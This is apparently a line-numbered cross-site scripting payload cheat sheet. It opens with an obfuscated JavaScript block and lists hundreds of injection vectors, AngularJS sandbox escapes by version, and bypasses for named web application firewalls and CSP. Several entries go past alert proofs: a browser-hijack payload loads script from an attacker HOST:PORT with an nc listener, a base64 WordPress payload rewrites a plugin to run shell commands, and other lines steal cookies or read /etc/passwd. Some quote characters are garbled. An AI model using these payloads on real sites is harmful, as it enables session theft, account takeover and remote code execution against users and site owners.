605(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[]
606
607
608
609"><"<img src="x">%20%20>"<iframe src=evil.source>%20<iframe>
610
611
612"><iframe src=a onload=alert("PENTEST") <
613
614" src="><svg/onload=prompt(2)> ""input onfocus=alert(2)" autofocus>
615
616" onfocus="alert(1)" autofocus
617
618t" onmouseover=alert(/xss/); a="
619
620%22onmouseover%3d%22alert(document.domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22uo545
621
622"><img src=x onerror=alert(/PTEST/)</script>
623 "><img src=x onerror=prompt(23);>
624
625<h>xxs link<a><img src="c" onerror=alert(1)>
626
627<img src=x onerror=alert('h')><xmp>
628
629<a onmouseover=alert(document.cookie)>xxs link</a>
630<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
631
632<div onactivate=alert('XSSTEST') id=xss style=overflow:scroll>
633
634Ij48IjxpbWcgc3JjPSJ4Ij4lMjAlMjA+IjxpZnJhbWUgc3JjPWE+JTIwPGlmcmFtZT4=
635
636
637
638
639String Char Eval
640 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
641
642 'a'.constructor.prototype['char\u0041t']
643
644 'a'.constructor.prototype['char\u0041t']=''.concat;
645
646{{'a'.constructor.prototype['char\u0041t']=''.concat;
647$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
648
649
650{{
651 ({}.toString()).constructor.prototype.charAt=[].join;
652 $eval(({}.toString()).constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
653}}
654
655
656
657{{
658 x=toString();x.constructor.prototype.charAt=x.constructor.prototype.concat;
659 $eval(x.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
660}}
661
662
663
664t=o.anchor(true);//<a name="true">[object Undefined]</a>
665
666
667
668{{
669c=[];
670o=toString();
671t=o.anchor(true);
672f=o.anchor(false);
673c.push(o[5]);
674c.push(o[1]);
675c.push(t[3]);
676c.push(f[12]);
677c.push(t[9]);
678c.push(t[10]);
679c.push(t[11]);
680c.push(o[5]);
681c.push(t[9]);
682c.push(o[1]);
683c.push(t[10]);
684a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114,116,40,49,41))()
685}}
686
687
688
689
690HTML Context
691Tag Injection <svg onload=alert(1)>
692ì><svg onload=alert(1)//
693
694
695HTML Context
696Inline Injection ìonmouseover=alert(1)//
697ìautofocus/onfocus=alert(1)//
698
699
700Javascript Context
701Code Injection ë-alert(1)-ë
702ë-alert(1)//
703
704
705Javascript Context
706Code Injection
707(escaping the escape) \í-alert(1)//
708
709
710Javascript Context
711Tag Injection
712</script><svg onload=alert(1)>
713
714
715PHP_SELF Injection
716http://DOMAIN/PAGE.php/î><svg onload=alert(1)>
717
718
719Without Parenthesis
720<svg onload=alert`1`>
721<svg onload=alert(1)>
722<svg onload=alert(1)>
723<svg onload=alert(1)>
724
725
726Filter Bypass
727Alert Obfuscation
728(alert)(1)
729a=alert,a(1)
730[1].find(alert)
731top[ìalî+îertî](1)
732top[/al/.source+/ert/.source](1)
733al\u0065rt(1)
734top[ëal\145rtí](1)
735top[ëal\x65rtí](1)
736top[8680439..toString(30)](1)
737
738
739Body Tag
740<body onload=alert(1)>
741<body onpageshow=alert(1)>
742<body onfocus=alert(1)>
743<body onhashchange=alert(1)><a href=#x>click this!#x
744<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
745<body onscroll=alert(1)><br><br><br><br>
746<br><br><br><br><br><br><br><br><br><br>
747<br><br><br><br><br><br><br><br><br><br>
748<br><br><br><br><br><br><x id=x>#x
749<body onresize=alert(1)>press F12!
750<body onhelp=alert(1)>press F1! (MSIE)
751
752
753Miscellaneous Vectors
754<marquee onstart=alert(1)>
755<marquee loop=1 width=0 onfinish=alert(1)>
756<audio src onloadstart=alert(1)>
757<video onloadstart=alert(1)><source>
758<input autofocus onblur=alert(1)>
759<keygen autofocus onfocus=alert(1)>
760<form onsubmit=alert(1)><input type=submit>
761<select onchange=alert(1)><option>1<option>2
762<menu id=x contextmenu=x onshow=alert(1)>right click me!
763
764
765Agnostic Event Handlers
766<x contenteditable onblur=alert(1)>lose focus!
767<x onclick=alert(1)>click this!
768<x oncopy=alert(1)>copy this!
769<x oncontextmenu=alert(1)>right click this!
770<x oncut=alert(1)>cut this!
771<x ondblclick=alert(1)>double click this!
772<x ondrag=alert(1)>drag this!
773<x contenteditable onfocus=alert(1)>focus this!
774<x contenteditable oninput=alert(1)>input here!
775<x contenteditable onkeydown=alert(1)>press any key!
776<x contenteditable onkeypress=alert(1)>press any key!
777<x contenteditable onkeyup=alert(1)>press any key!
778<x onmousedown=alert(1)>click this!
779<x onmousemove=alert(1)>hover this!
780<x onmouseout=alert(1)>hover this!
781<x onmouseover=alert(1)>hover this!
782<x onmouseup=alert(1)>click this!
783<x contenteditable onpaste=alert(1)>paste here!
784
785
786Code Reuse
787Inline Script
<script>alert(1)//
788<script>alert(1)<!ñ
789
790
791Code Reuse
792Regular Script
<script src=//localhost:8080/1.js>
793<script src=//3334957647/1>
794
795
796Filter Bypass
797Generic Tag + Handler
798Encoding / Mixed Case / Spacers
799%3Cx onxxx=1
800<%78 onxxx=1
801<x %6Fnxxx=1
802<x o%6Exxx=1
803<x on%78xx=1
804<x onxxx%3D1 <X onxxx=1
805<x OnXxx=1
806<X OnXxx=1
Doubling
807<x onxxx=1 onxxx=1 <x/onxxx=1
808<x%09onxxx=1
809<x%0Aonxxx=1
810<x%0Conxxx=1
811<x%0Donxxx=1
812<x%2Fonxxx=1
813Quotes / Stripping / Mimetism
814<x 1=í1íonxxx=1
815<x 1=î1?onxxx=1 <[S]x onx[S]xx=1
816
817
818[S] = stripped char or string
819<x </onxxx=1
820<x 1=î>î onxxx=1
821<http://onxxx%3D1/
822
823Generic Source Breaking
824<x onxxx=alert(1) 1=í
825
826
827Browser Control
828<svg onload=setInterval(function(){with(document)body.
829appendChild(createElement(ëscriptí)).src=í//HOST:PORTí},0)>$ while :; do printf ìj$ ì; read c; echo $c | nc -lp PORT >/dev/null; done
830
831
832Multi Reflection — Double Reflection
833Single Input / Single Input (script-based)
834ëonload=alert(1)><svg/1=í ë>alert(1)</script><script/1=í
835*/alert(1)</script><script>/*
836
837Triple Reflection
838Single Input / Single Input (script-based)
839*/alert(1)î>íonload=î/*<svg/1=í
840`-alert(1)î>íonload=î`<svg/1=í */</script>í>alert(1)/*<script/1=í
841
842
843Multi Input — Double Input / Triple Input
844p=<svg/1=í&q=íonload=alert(1)>
845p=<svg 1=í&q=íonload=í/*&r=*/alert(1)í>
846
847
848Without Event Handlers
849<script>alert(1)</script>
850<script src=javascript:alert(1)>
851<iframe src=javascript:alert(1)>
852<embed src=javascript:alert(1)>
853<a href=javascript:alert(1)>click
854<math><brute href=javascript:alert(1)>click
855<form action=javascript:alert(1)><input type=submit>
856<isindex action=javascript:alert(1) type=submit value=click>
857<form><button formaction=javascript:alert(1)>click
858<form><input formaction=javascript:alert(1) type=submit value=click>
859<form><input formaction=javascript:alert(1) type=image value=click>
860<form><input formaction=javascript:alert(1) type=image src=SOURCE>
861<isindex formaction=javascript:alert(1) type=submit value=click>
862<object data=javascript:alert(1)>
863<iframe srcdoc=<svg/onload=alert(1)>>
864<svg><script xlink:href=data:,alert(1) />
865<math><brute xlink:href=javascript:alert(1)>click
866<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
867
868
869Mobile Only
870Event Handlers
871<html ontouchstart=alert(1)>
872<html ontouchend=alert(1)>
873<html ontouchmove=alert(1)>
874<html ontouchcancel=alert(1)>
875<body onorientationchange=alert(1)>
876
877
878JavaScript Properties / Functions
879<svg onload=alert(navigator.connection.type)>
880<svg onload=alert(navigator.battery.level)>
881<svg onload=alert(navigator.battery.dischargingTime)>
882<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
883<svg onload=navigator.vibrate([500,300,100])>
884
885
886Generic Self-XSS to Regular XSS
887<iframe src=LOGOUT_URL onload=forms[0].submit()>
888</iframe><form method=post action=LOGIN_URL>
889<input name=USERNAME_PARAMETER_NAME value=USERNAME>
890<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
891
892
893File Upload — Injection in Filename
894ì><img src=1 onerror=alert(1)>.gif
Injection in Metadata
895$ exiftool -Artist='î><img src=1 onerror=alert(1)>í FILENAME.jpeg
Injection with SVG File
896<svg xmlns=îhttp://www.w3.org/2000/svgî onload=îalert(document.domain)î/>
897
898
899Injection with GIF File as Source of Script (CSP Bypass)
900GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
901
902Google Chrome
903Auditor Bypass
904<script src=îdata:,alert(1)//
905ì><script src=data:,alert(1)//<script src=î//localhost:8080/1.js#
906ì><script src=//localhost:8080/1.js#<link rel=import href=îdata:text/html,<script>alert(1)</script>
907ì><link rel=import href=data:text/html,<script>alert(1)</script>
908<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
909
910Chrome < v60 beta XSS-Auditor Bypass
911
912<script src="data:,alert(1)%250A-->
913
914Other Chrome XSS-Auditor Bypasses
915
916<script>alert(1)</script
917
918<script>alert(1)%0d%0a-->%09</script
919
920<x>%00%00%00%00%00%00%00<script>alert(1)</script>
921
922Safari XSS Vector
923
924<script>location.href;'javascript:alert%281%29'</script>
925
926XSS Polyglot
927
928jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
929
930PHP File for XHR Remote Call
931<?php header(ìAccess-Control-Allow-Origin: *î); ?>
932<img src=1 onerror=alert(1)>
933Server Log Avoidance
<svg onload=eval(URL.slice(-8))>#alert(1)
934<svg onload=eval(location.hash.slice(1)>#alert(1)
935<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
936
937<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
938
939
940Shortest PoC
941<base href=//0>
942
943
944$ while:; do echo ìalert(1)î | nc -lp80; done
945Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
946#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
947Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
948aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
949X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
9505yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
951RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9529TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
953wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
954Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
955
956
957Invisible JS Alert
958([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
959[??+=?+?????+??????+???+??+????+??+???+?+??][??]
960(?????+????+???+??+???+'`#JS!`')``
961
962
963Markdown XSS
964
965[a](javascript:confirm(1))
966
967[a](javascript://www.test.com%0Aprompt(1))
968
969[a](javascript://%0d%0aconfirm(1))
970
971[a](javascript://%0d%0aconfirm(1);com)
972
973[a](javascript:window.onerror=confirm;throw%201)
974
975[a]: (javascript:prompt(1))
976
977[a]:(?javascript:alert(1))
978
979
980AngularJS
981'a'.constructor.fromCharCode=[].join;
982'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
983
984{{
985'a'.constructor.prototype.charAt=[].join;
986eval('x=1} } };alert(1)//');
987}}
988
989AngularJS Template Injection-based XSS (by version)
990
9911.0.1 - 1.1.5
992
993{{constructor.constructor('alert(1)')()}}
994
9951.2.0 - 1.2.1
996
997{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
998
9991.2.2 - 1.2.5
1000
1001{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1002
10031.2.6 - 1.2.18
1004
1005{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1006
10071.2.19 - 1.2.23
1008
1009{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1010
10111.2.24 - 1.2.29
1012
1013{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1014
10151.3.0
1016
1017{{!ready && (ready = true) && (
1018 !call
1019 ? $$watchers[0].get(toString.constructor.prototype)
1020 : (a = apply) &&
1021 (apply = constructor) &&
1022 (valueOf = call) &&
1023 (''+''.toString(
1024 'F = Function.prototype;' +
1025 'F.apply = F.a;' +
1026 'delete F.a;' +
1027 'delete F.valueOf;' +
1028 'alert(1);'
1029 ))
1030 );}}
1031
10321.3.1 - 1.3.2
1033
1034{{
1035 {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1036 'a'.constructor.prototype.charAt=''.valueOf;
1037 $eval('x=alert(1)//');
1038}}
1039
10401.3.3 - 1.3.18
1041
1042{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1043
1044 'a'.constructor.prototype.charAt=[].join;
1045 $eval('x=alert(1)//'); }}
1046
10471.3.19
1048
1049{{
1050 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
1051 $eval('x=alert(1)//');
1052}}
1053
10541.3.20
1055
1056{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1057
10581.4.0 - 1.4.9
1059
1060{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1061
10621.5.0 - 1.5.8
1063
1064{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
1065
10661.5.9 - 1.5.11
1067
1068{{
1069 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
1070 c.$apply=$apply;c.$eval=b;op=$root.$$phase;
1071 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
1072 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
1073 B=C(b,c,b);$evalAsync("
1074 astNode=pop();astNode.type='UnaryExpression';
1075 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
1076 astNode.argument={type:'Identifier',name:'foo'};
1077 ");
1078 m1=B($$asyncQueue.pop().expression,null,$root);
1079 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
1080 $eval('a(b.c)');[].push.apply=a;
1081}}
1082
10831.6.0+ (expression sandbox removed)
1084
1085{{constructor.constructor('alert(1)')()}}
1086
1087Content Security Policy (CSP) bypass via JSONP endpoints
1088
1089Grab the target's CSP:
1090
1091curl -I http://example.com | grep 'Content-Security-Policy'
1092
1093
1094Lightweight Markup Languages
1095
1096RubyDoc (.rdoc)
1097
1098XSS[JavaScript:alert(1)]
1099
1100Textile (.textile)
1101
1102"Test link":javascript:alert(1)
1103
1104reStructuredText (.rst)
1105
1106`Test link`__.
1107
1108__ javascript:alert(document.domain)
1109
1110Unicode characters
1111
1112Üáï<img src=a onerror=javascript:alert('test')>ÖâÄ
1113
1114
1115
1116Sandbox Bypasses (AngularJS)
1117{{constructor.constructor('alert(1)')()}}
1118
1119{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1120
1121{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1122
1123{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1124
1125{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1126
1127{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1128
1129{{!ready && (ready = true) && (
1130 !call
1131 ? $$watchers[0].get(toString.constructor.prototype)
1132 : (a = apply) &&
1133 (apply = constructor) &&
1134 (valueOf = call) &&
1135 (''+''.toString(
1136 'F = Function.prototype;' +
1137 'F.apply = F.a;' +
1138 'delete F.a;' +
1139 'delete F.valueOf;' +
1140 'alert(1);'
1141 ))
1142 );}}
1143
1144{{
1145 {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1146 'a'.constructor.prototype.charAt=''.valueOf;
1147 $eval('x=alert(1)//');
1148}}
1149
1150{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
1151 'a'.constructor.prototype.charAt=[].join;
1152 $eval('x=alert(1)//'); }}
1153
1154{{
1155 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
1156 $eval('x=alert(1)//');
1157}}
1158
1159{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1160
1161{{
1162 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
1163 c.$apply=$apply;c.$eval=b;op=$root.$$phase;
1164 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
1165 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
1166 B=C(b,c,b);$evalAsync("
1167 astNode=pop();astNode.type='UnaryExpression';
1168 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
1169 astNode.argument={type:'Identifier',name:'foo'};
1170 ");
1171 m1=B($$asyncQueue.pop().expression,null,$root);
1172 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
1173 $eval('a(b.c)');[].push.apply=a;
1174}}
1175
1176{{constructor.constructor('alert(1)')()}}
1177
1178
1179Kona WAF (Akamai) Bypass
1180
1181\');confirm(1);//
1182
1183ModSecurity WAF Bypass. Note: whether this works depends on the security level the rule set is configured at. See: https://modsecurity.org/rules.html
1184
1185<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
1186
1187Wordfence XSS Bypasses
1188
1189<meter onmouseover="alert(1)"
1190
1191'">><div><meter onmouseover="alert(1)"</div>"
1192
1193>><marquee loop=1 width=0 onfinish=alert(1)>
1194
1195Incapsula WAF Bypasses
1196
1197<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
1198
1199<img/src=q onerror='new Function`al\ert\`1\``'>
1200
1201jQuery < 3.0.0 XSS
1202
1203$.get('http://sakurity.com/jqueryxss')
1204
1205To actually exploit this jQuery XSS, one of the following requirements must be met:
1206
1207 Find any cross-domain requests to untrusted domains that may inadvertently execute script.
1208 Find any requests to trusted API endpoints where script can be injected into the data sources.
1209
1210URL verification bypasses (works without the embedded tab character too)
1211
1212javas	cript://www.google.com/%0Aalert(1)
1213
1214
1215
1216
1217
1218
1219Signal Messenger Payloads
1220http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
1221
1222http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
1223
1224http://testdomain/?p=%3d%3Ciframe%20src=\\xxx.xxx.xxx.xxx\Temp\rce.html%3E
1225
1226http://testdomain/?p=%3Ciframe%20src="testfile.html"%3E%3C/iframe%3E%20PENTEST
1227
1228http://testdomain/?p=%3Ciframe%20srcdoc="<p>PENTEST</p>"%3E%3C/iframe%3E
1229
1230http://testdomain/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
1231
1232http://testdomain/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
1233
1234http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E
1235
1236
1237
1238
1239WAF Engine Bypass
1240<svg onload\r\n=$.globalEval("al"+"ert()");>
1241<img onload\r\n=$.globalEval("al"+"ert()");>
1242<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>